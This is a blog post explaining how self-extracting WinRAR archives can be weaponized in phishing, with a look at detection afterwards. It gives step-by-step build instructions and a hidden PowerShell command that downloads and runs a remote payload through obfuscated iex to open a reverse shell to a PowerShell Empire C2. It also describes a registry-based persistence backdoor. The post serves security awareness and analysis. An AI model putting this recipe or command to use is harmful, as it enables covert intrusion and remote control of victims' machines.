Mikołaj Prus ( nullorx ) · Follow
6 min read · Dec 31, 2023
--
Opening a normal zip file is totally safe, right?
Today I would like to show you why that is not always the case. I’ll start by explaining what self-extracting zip files are ( a.k.a SFX archives ), how they work and finish by showing you some real examples of how they can be used for malicious purposes.
In my last post I described how LNK files can be used by attackers to gain control on victim devices. If you haven’t yet read it, check it out :>
https://medium.com/@drthkol478/click-me-get-hacked-lnk-malware-87ef071630b2
Let’s get started.
Due to the fact that macros have disabled by default by Microsoft in Word and Excel documents, threat actors started to seek new ways of disguising and delivering their malware in phishing campaigns.
At the end of the day it always comes down to a file of some sort that executes a payload once opened by the user. Fortunately, normally there are many if’s that can prevent that.
For example, let’s imagine a payload that targets outdated software or macros that require you to click “OK” on a big yellow warning telling the user that this file may be dangerous.
Both these examples can be mitigated, either by proper cyber awareness trainings in your staff or by following security update guidelines and patching the software on the machines in your network.
But when it comes to SFX archives, the situation gets tricky. They’re just normal zip files with some additional settings. That means that if the malware is properly obfuscated, then even if the zip file is unencrypted and your AV can scan it, it simply won’t help much. The code inside will stay undetected and get executed anyway.
That’s why it is so important to understand how SFX archives work, to know what to expect when they are sent in a suspicious email and how to analyze what they’re doing :)
Self-extracting archives are simply put, a normal zip or rar file that contains so-called ‘SFX’ commands or modules. They give you the possibility to run a specific command once the archive gets opened.
The way in which they can be induced to execute code is similar to the case with LNK files. We can just set the SFX commands to execute a windows binary that downloads and executes the next stage of our payload.
To demonstrate how that can be achieve, I will show you how to create an SFX archive yourself, as the process itself is pretty trivial and takes just a couple of steps:
- Create a normal archive with winrar.
2. Check the “Convert Archive to SFX” option and choose the normal archive created in the previous step.
3. Go to SFX > Advanced SFX Options.
4. In the new SFX options windows, check the following two options in the Update tab to ensure the archive is properly extracted an will overwrite any copies of the archive content.
5. Enable the “Hide all” option to make the archive launch the SFX command without any open/installation window:
6. Finally, paste a LOLBIN command in the Setup tab. After that click OK and create the archive:
powershell.exe -WindowStyle Hidden -c "$buf = iwr('http://192.168.56.111:9000/userhistory_records');i''e''x($buf)"This command will be run once the archive gets opened. We can find it by inspecting the archive and looking into the comment section, which lists the SFX module command:
For the purpose of presenting how sfx archives can be weaponized I’ll be using PowershellEmpire. I’ve covered how to set it up for such testing in my previous post about exploiting .lnk files :)
Now, let’s see our SFX sample in action. Below you can see what happens once it gets executed, establishing a reverse shell connection to my Powershell Empire C&C. I entered into the shell and executed a basic whoami command as a POC :>
Additionaly, in the second GIF you can see what network traces that this SFX payload leaves behind on the wire.
Pretty quick and stealthy. Of course, except the powershell window, but it still arouses way less suspicion than more classical phishing payloads :>
Interestingly, the possibilites aren’t limited to simply connecting back to a C2, as SFX archives can be used very creatively.
Cloudstrike SFX malware article:
https://www.crowdstrike.com/blog/self-extracting-archives-decoy-files-and-their-hidden-payloads/
For example, according to some CloudStrike research, adversaries were able to create a persistent backdoor on the target system by setting the “utilman” value in the Windows registry, which describes what to execute during logon to point at an encrypted SFX archive.
Once the user logged onto the victim machine, they were welcomed by a window asking for a password required to unzip the SFX archive:
If the password was provided, task manager, powershell and cmd windows were spawned, granting the attacker a backdoor that didn’t require them to know any user’s password.
The “Setup” tab containing the SFX commands in this case looked like this:
As you can see, the payload is incredibly simple, but powerfull as well, since there are no command line arguments here or anything that would make these commands stand out in the logs from the system!!
The one key takeaway from this case is that normal functionality combined with some creativity can lead to unintended ways of establishing persistence! Therefore we always need to stay curious and vigilant to notice novel techniques when they pop round the corner :)
- Zip files can be easily weaponized into SFX archives for malicious purposes.
- Fortunately you can inspect these files by looking at SFX properties and the comment section.
- SFX archives can serve as a silent backdoor and if not encrypted require just to be double cliked to execute it’s “hidden” payload
That’s all for this post. I hope you liked it and learned something new!!
